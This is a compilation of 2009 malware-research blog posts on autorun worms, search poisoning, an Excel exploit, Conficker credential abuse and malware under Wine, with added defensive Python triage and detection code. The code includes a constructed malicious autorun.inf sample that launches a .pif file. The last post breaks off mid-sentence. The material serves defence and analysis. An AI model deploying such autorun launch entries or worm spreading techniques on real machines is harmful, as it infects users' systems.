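    When triaging a removable drive from an outbreak like this, the two questions are what the autorun.inf would launch and which other .pif/.scr files are sitting on the drive after cleaning. The Python below is an added example (not code from the post) that reads an autorun.inf tolerantly, the way the Windows INI reader does (case-insensitive keys, junk and comment lines skipped), collects the files named by open=, shellexecute= and shell\…\command= entries, and matches them against a directory listing so that both the launched file and any orphan renamed executables are reported. The autorun.inf and listing are constructed; jvtmgfh.pif and qwzpl.scr are placeholder names, and the junk lines only stand in for the obfuscation seen in the real files (the snippets above are images and are not reproduced here).

```python
import re
from collections import defaultdict

# Keys whose value names a file that autorun would run or show.
INTERESTING_KEYS = re.compile(r"^(open|shellexecute|icon|shell\\[^\\]+\\command)$", re.I)
LEFTOVER_EXTS = {".pif", ".scr"}


def parse_autorun_inf(text: str):
    """Tolerant reader for autorun.inf: case-insensitive [autorun] section,
    'key=value' pairs, and junk lines (binary padding, comments) skipped.
    Returns {normalized_lowercase_key: value}."""
    entries = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip().strip("\x00")
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if not in_autorun or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if INTERESTING_KEYS.match(key):
            entries[key.lower()] = value
    return entries


def referenced_targets(entries):
    """Files the autorun.inf would launch, mapped to the keys naming them."""
    targets = defaultdict(set)
    for key, value in entries.items():
        if key == "icon":            # icon= points at a resource, not a launch
            continue
        exe = value.split(",")[0].strip().strip('"')   # strip "file,args" and quotes
        exe = exe.split(" ")[0] if exe else exe        # drop trailing arguments
        if exe:
            targets[exe.lower()].add(key)
    return dict(targets)


def triage_removable_drive(autorun_text: str, listing):
    """Report files launched by autorun.inf and orphan .pif/.scr executables,
    since cleaning the infection leaves the second kind behind."""
    targets = referenced_targets(parse_autorun_inf(autorun_text))
    report = []
    for name in listing:
        ext = name[name.rfind("."):].lower() if "." in name else ""
        if name.lower() in targets:
            keys = ", ".join(sorted(targets[name.lower()]))
            report.append((name, "launched by autorun.inf: " + keys))
        elif ext in LEFTOVER_EXTS:
            report.append((name, "orphan .pif/.scr: likely a renamed executable left behind"))
    return report


# Constructed autorun.inf with mixed-case keys and junk lines; names are placeholders.
SAMPLE_AUTORUN = (
    "[AutoRUn]\r\n"
    ";\x8f\xe2\x01 junk comment line\r\n"
    "\x7f\xe9\x03 garbage without an equals sign\r\n"
    "OpEn=jvtmgfh.pif\r\n"
    "sHeLl\\OpEN\\CoMMAnD=jvtmgfh.pif\r\n"
    "shell\\explore\\Command = jvtmgfh.pif\r\n"
    "sHELL\\AUTopLAY\\COmmaND=jvtmgfh.pif\r\n"
    "UseAutoPlay=1\r\n"
)
# Constructed directory listing of the drive after the infection.
SAMPLE_LISTING = ["photos", "report.docx", "autorun.inf", "jvtmgfh.pif", "qwzpl.scr"]


if __name__ == "__main__":
    for name, why in triage_removable_drive(SAMPLE_AUTORUN, SAMPLE_LISTING):
        print(f"{name}: {why}")
```

    The orphan check is the one that matters after cleanup: the post’s point is that a disinfected, renamed notepad.exe with a .pif or .scr extension stays on the drive, and without the autorun.inf that referenced it nothing else explains where it came from.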

    Google Bucking the Trend?

    The other day I blogged about Google Trends being abused to serve malware.  The attackers were not only targeting the most popular search terms, but also manipulating Google’s page rankings to appear high up on search results.  It appears that Google may have squashed those attacks, at least at the moment.

    The pages that were coming up while searching Google seem to be purged from Google’s index.  The pages may still be found on other search engines, though not ranked as high.  This is also visible in stats I started gathering yesterday.

    I took the top 100 search terms for each day of this week and ran a Google search on each term. I then considered the top 10 search results for each term, looking for poisoned links with high rankings. Admittedly it would have been better to gather the search results on each day rather than running the test several days after the fact, but nonetheless the limited results do suggest that Google took some recent action.

    The following graph shows significant activity prior to mid-day yesterday.

    We can assume the attackers will be looking at new and creative ways to circumvent any countermeasures that may be in place.

    Search safe.

    Google Trends Abused to Serve Malware

    The other day a worm, often referred to as “Error Check System” was spreading on Facebook.  In fact if you searched for information on this threat, your search results were poisoned to lead unsuspecting victims to a site that attempts to install a rogue anti-spyware Trojan.  Some folks blogged that this search connection was “too much of a coincidence“, and that the Facebook part of the threat was a “red herring“.  I do not believe this is the case, and here’s why.

    Last week I was following up on a comment made to the McAfee Avert Labs blog. The URL provided by the visitor (**********.******.bee.pl/waledac_botnet.html) redirected to another site that attempted to install the same trojan. Running a search on part of that URL yielded hundreds of search results, many placed high up on Google’s results. The summary text was relevant to the search term, and it’s clear that those behind the redirects are manipulating Google: not only getting their newly created sites to appear high on the results page, but also displaying relevant text in the page summary section, and for the hottest terms. Here’s one example, ironically related to the recent Gmail outage.

     

    You’ll also notice that the page summary is identical to the top search result, taken from Google News.  Looking at more search results it is clear that the attackers are targeting popular search terms.

    Other searches show the results using all-lowercase titles, the same as used by Google Trends. In fact, checking some of the top Google Trends links we can see that the abusers are hitting it (“ash wednesday 2009” was the #1 search term at the time of this writing; this image was edited to fit on the blog).

    The notion of malware distributors abusing Google Trends is not new, and received some attention in October of last year.  However, I do not recall previous attacks being as aggressive as the current ones, being distributed across numerous sites, targeting many many high-profile search terms, and having the poisoned links regularly appearing high up in the result pages.

    Once a user visits one of these poisoned links, the destination page references a script file (style.js), which is obfuscated.

    Decoding the script shows that it redirects the user only when the referring URL contains “google”, “msn”, “yahoo”, “comcast” or “aol.com”. This is just one of the many ways the bad guys focus their attacks on potential victims while making it a little harder for others to discover. Once you’re redirected, it’s situation normal for the attackers: various fake alert and scanning messages and windows appear, ultimately leading to the installation of a FakeAlert trojan (such as one of the 9,500+ known binaries McAfee identifies as FakeAlert-AB).

    If you made it down to the bottom of this blog, I probably don’t need to remind you to look carefully before you click on the Web.

    New Excel Trojan Hits the Net

    – Update Feb 24, 10:15 PDT –
    Microsoft has released a security advisory for this issue (CVE-2009-0238):
    http://www.microsoft.com/technet/security/advisory/968272.mspx

    Many versions of Excel are vulnerable, including 2000, 2002, 2003, 2007, 2004/2008 for Mac, Excel Viewer/Excel Viewer 2003.

    A Trojan exploiting an unpatched Microsoft Excel vulnerability has been reported from the field. McAfee Avert Labs has confirmed that Microsoft Excel 2007 and 2003 are affected. Other versions may also be impacted.

    McAfee DAT files identify known malicious Excel spreadsheet files as Exploit-MSExcel.r Trojan, and dropped files as BackDoor-DUE Trojan in the 5534 DATs.

    As with the initial Exploit-PDF.i threat, current attacks are very targeted and limited. When successful, the exploit installs a backdoor that attempts to connect to a remote site on port 80 and waits for commands.

    The mitigation for this infection is to block unknown TCP connections. However, one of the best protection methods is to remain vigilant against Excel files from untrusted sources or sent at an unexpected time until a security update is available.

    What Have We Learned From Past Virus Infections?

    The year 2009 has so far been a hectic one for anti-virus vendors and IT administrators alike, “thanks” to two prolific malware families: W32/Conficker and W32/Virut. Malware researchers and field engineers have literally burned the midnight oil to ensure networks are protected against these threats.

    Some of the organizations that were hit with these infections had the latest Microsoft updates installed but still got infected. During the post-mortem of the outbreaks, one glaring mistake stood out.

    Administrators routinely attend to distress calls from users whenever they have an issue with their machines. By habit, the admins tend to log onto the affected workstation using their own accounts—which have domain-administrator privileges. For a moment, let us assume the user’s workstation was infected with W32/Conficker. What could possibly go wrong from here?

    When the W32/Conficker worm infects a machine, it scans the local network and attempts to infect machines using the credentials of the currently logged-on user. If the initial login attempt fails, then the worm attempts a brute-force attack to authenticate, using a hardcoded list of passwords. Because most organizations have enforced complex password policies these days, brute-forcing is ineffective. But the moment the administrator logs onto the affected machine using his or her domain account, W32/Conficker runs using the elevated credentials of a domain administrator. Straight away the worm can infect any host on the domain using these newly acquired administrator credentials. Shown below is a traffic-capture screenshot of this behavior.

    W32/Conficker infecting via SMB

    Upon copying the worm’s DLL to the System32 folder, W32/Conficker proceeds to create a scheduled job task to execute the worm at a predefined time. In a matter of minutes the entire network, with thousands of machines, gets infected.

    It’s pretty much the same story with W32/Virut, a polymorphic entry-point-obscuring virus that spreads by infecting executable and script files. A machine infected with W32/Virut would scan and infect shared drives on the network using the credentials of the currently logged-on user. Because most domain users have limited write access to shared resources on the network, the infection is confined to a subset of machines. But the moment the administrator commits the cardinal sin of logging onto an infected machine, W32/Virut runs with elevated credentials and has write access to every C$ and Admin$ share on the network.
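    A detection check for the credential reuse described above, as an added example that is not part of the original post: it replays constructed logon records (a simplified CSV, not a real Windows event-log format) and flags an account whose network logons from one source fan out to many hosts within a short window, which is what the worm does the moment it gets hold of a domain administrator’s token. Host names, account names and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (simplified CSV, not a real Windows event-log layout):
# time, account, source host, target host, logon type
# (3 = network logon such as an ADMIN$/C$ share access, 2 = console logon).
# CORP\dadmin logs on at the console of infected WS-0417; the worm then
# reuses that token against six other hosts within ten seconds.
SAMPLE_LOG = """\
2009-02-20 09:00:05,CORP\\dadmin,WS-0417,WS-0417,2
2009-02-20 09:00:41,CORP\\dadmin,WS-0417,WS-0012,3
2009-02-20 09:00:42,CORP\\dadmin,WS-0417,WS-0013,3
2009-02-20 09:00:43,CORP\\dadmin,WS-0417,WS-0014,3
2009-02-20 09:00:45,CORP\\dadmin,WS-0417,FS-01,3
2009-02-20 09:00:47,CORP\\dadmin,WS-0417,FS-02,3
2009-02-20 09:00:51,CORP\\dadmin,WS-0417,PRN-03,3
2009-02-20 09:05:00,CORP\\jdoe,WS-0099,FS-01,3
2009-02-20 09:30:00,CORP\\jdoe,WS-0099,FS-02,3
"""


def parse_log(text):
    """Turn the CSV lines into (time, account, src, dst, logon_type) tuples."""
    events = []
    for line in text.splitlines():
        ts, account, src, dst, ltype = line.split(",")
        events.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       account, src, dst, int(ltype)))
    return events


def find_fanout(events, max_hosts=5, window=timedelta(minutes=2)):
    """Flag (account, source host) pairs whose network logons reach more than
    max_hosts distinct targets inside `window`. An admin fixing one box does
    not do this; a worm replaying that admin's credentials does.
    Returns {account: (source_host, window_start, sorted target hosts)}."""
    by_key = defaultdict(list)
    for ts, account, src, dst, ltype in events:
        if ltype == 3:
            by_key[(account, src)].append((ts, dst))
    alerts = {}
    for (account, src), hits in by_key.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            targets = {dst for ts, dst in hits[i:] if ts - start <= window}
            if len(targets) > max_hosts:
                alerts[account] = (src, start, sorted(targets))
                break
    return alerts
```

    Pair the alert with the console logon that immediately precedes it, as in the sample, and you have the admin session that handed the worm its credentials.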

    To prevent such an outbreak from happening, it is imperative that administrators refrain from logging onto a suspect machine using their own accounts. Logging on using the workstation’s local administrator account can also have the same effect; most corporate workstations are ghosted from the same image and could have the same local admin account and password.

    An alternative is to use remote desktop solutions such as VNC, GoToAssist, or TeamViewer. These three are not tied to domain authentication. Once a suspect machine is identified, it should be isolated from the network for further investigation. Better safe than sorry ;-)

    Running Windows Malware in Linux

    For the unaware, Wine is an application that enables users to run Windows applications on Unix-like computers. Like many users, I use Wine on my Linux machine to run a couple of Windows applications I cannot do without. I could run these applications on a virtual machine, or even dual-boot with Windows and Linux, but running them in Wine is just easier.

    Although running Windows applications in Wine has its advantages, it also comes at a price: bringing Windows malware into Linux. I’m aware that it isn’t Wine’s responsibility to distinguish between a malicious and a nonmalicious file, and that Wine shouldn’t have any problem running a malicious file; however, I had this morbid curiosity to see how well today’s malware would fare running on Wine, and so began an experiment using the following setup:

    • Ubuntu Linux 8.04 [comes with Gnome desktop environment]
    • Wine 1.0 [run as a nonroot user with default settings]

    I decided to choose samples that displayed a cocktail of malicious behavior, and so I chose the following:

    File Infectors

    W32/Philis is a file infector that, apart from appending its code to other executables, downloads and drops other malware.

    This malware ran without throwing any errors in Wine. It immediately dropped files in the “Windows” and “Windows\System32” folders and executed these dropped files. It then attempted to connect to a preconfigured site, and downloaded more malware successfully. It also began infecting executables in the Wine directory and created a registry run key for the malicious file.

    The screenshot below shows the clean “CProcess.ori,” the original file 35KB in size, and “CProcess.vir,” the infected file 131KB in size.

    It’s worth mentioning that the autostart registry key the file infector created will not work under Wine, so applications will not be able to autostart when the Linux machine is booted up. Also, this file infector didn’t seem to infect ELF files. But I’m guessing that a file infector that blindly appends/prepends its code to other files shouldn’t have any problem corrupting ELF files.

    Autorun Malware

    W32/Autorun.Worm.CP is an autorun worm, which drops autorun.inf in the root of removable drives.

    This malware also ran without any errors. It dropped both the malicious files and the associated autorun.inf file in the C:\ drive and attached removable devices, and created a registry run key.

    The screenshot below shows the created Autorun.inf file, along with the malicious files that were created in the root of the removable device.

    The registry run key created by the malware won’t work in Wine, however. As long as the malicious file is running, any new removable devices connected to the machine will get infected, thus making a Linux machine the origin of an infection.

    Although it is difficult for malware to autostart in Wine, it is not impossible. Malware can be written to find out if it is running in Wine. It can then either download a Linux binary onto the machine and/or simply add an autostart entry for itself in the Linux desktop environment’s common autostart locations, using the nonroot user’s credentials.

    IRC Trojans

    IRC/Contact malware drops files and connects to a preconfigured IRC server. This IRC Trojan, when run in Wine, connected to the preconfigured IRC server. From the IRC server I was able to connect to the bot and control it. Though the control was limited, I was still able to list the files under the Wine directory, get system information, download files to the Linux machine remotely, etc.

    The screen shot below shows my logging into the infected Linux machine and issuing commands:


    The screen shot below shows the infected machine responding to the “getinfo” command issued from the IRC channel:


    This IRC Trojan was very simple in features, but I’m guessing that with a complex one, an attacker shouldn’t have any problem scanning the subnet for an exploit and sending a payload to infect Windows machines.

    Keyloggers/Password Stealers

    Apart from this, I tried running a couple of password stealers and keyloggers, but I couldn’t find one that worked well. I’m guessing they couldn’t get a hook to the keyboard.

    Although stealing information using Windows malware in Wine is difficult, an infected Linux machine can still contribute to a DoS attack or be the origin of an infection, as suggested earlier.

    Scareware

    This class of malware displays falsely exaggerated scan reports and tricks users into buying a fake product. It utilizes extreme social-engineering tactics combined with obfuscated JavaScript that checks for exploits on the machine.

    Although I didn’t run the Scareware installer in Wine, I did browse through a site that ran a JavaScript to pop up a window informing me that my “Windows” machine was infected, and requested that I install the malicious file.

    Screen shots below:


    It is important to note that if the user had set the file association for Windows executables with Wine, then simply double-clicking the downloaded file would run the malware.

    Mitigation Techniques

    • Never run Wine applications as root.
    • Wine maps the root directory, the user’s home directory, CD ROMs and removable devices found, and these mappings are listed in “~/.wine/dosdevices/”. Consider deleting these except the link to your drive_c.
    • Do not set the file association for Windows executables with Wine. This would enable the running of Windows executables in Wine by simply double-clicking them.
    • Administrators should think t
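
    As an added example (not code from the original post or from the Wine project), a small audit for the second and third points above: it lists every dosdevices mapping that reaches outside the prefix’s own drive_c, and checks whether the desktop has associated .exe files with Wine. It assumes the standard ~/.wine layout and the freedesktop mimeapps.list format with its application/x-ms-dos-executable type; the demo prefix is constructed in a temporary directory rather than read from a real install.

```python
import os
import tempfile
import configparser

# freedesktop MIME type for .exe files; the Wine package registers
# wine.desktop as a handler for it.
EXE_MIME = "application/x-ms-dos-executable"


def audit_dosdevices(prefix):
    """Return {drive: target} for every dosdevices mapping that is not the
    prefix's own drive_c (e.g. z: -> /, d: -> a USB stick). Each one is a
    path that Windows malware running in Wine can read, infect or seed."""
    dosdev = os.path.join(prefix, "dosdevices")
    drive_c = os.path.realpath(os.path.join(prefix, "drive_c"))
    findings = {}
    for name in sorted(os.listdir(dosdev)):
        path = os.path.join(dosdev, name)
        if os.path.islink(path) and os.path.realpath(path) != drive_c:
            findings[name] = os.path.realpath(path)
    return findings


def exe_opens_with_wine(mimeapps_path):
    """True if the user's mimeapps.list makes Wine the default handler for
    .exe files, so a downloaded executable runs on double-click."""
    cfg = configparser.ConfigParser(interpolation=None)
    if not cfg.read(mimeapps_path):
        return False
    return "wine" in cfg.get("Default Applications", EXE_MIME, fallback="").lower()


def build_demo_prefix():
    """Construct a throwaway prefix shaped like a default Wine 1.0 install
    (c: -> drive_c, z: -> /, a mounted USB stick as d:) plus a mimeapps.list
    that associates .exe with Wine. Returns (prefix_path, mimeapps_path)."""
    root = tempfile.mkdtemp()
    prefix = os.path.join(root, ".wine")
    os.makedirs(os.path.join(prefix, "drive_c"))
    os.makedirs(os.path.join(prefix, "dosdevices"))
    os.symlink("../drive_c", os.path.join(prefix, "dosdevices", "c:"))
    os.symlink("/", os.path.join(prefix, "dosdevices", "z:"))
    os.symlink("/media/usbdisk", os.path.join(prefix, "dosdevices", "d:"))
    mimeapps = os.path.join(root, "mimeapps.list")
    with open(mimeapps, "w") as fh:
        fh.write("[Default Applications]\n%s=wine.desktop\n" % EXE_MIME)
    return prefix, mimeapps
```

    On a real machine, run audit_dosdevices on os.path.expanduser("~/.wine") and exe_opens_with_wine on ~/.local/share/applications/mimeapps.list; every mapping reported is one the post suggests removing.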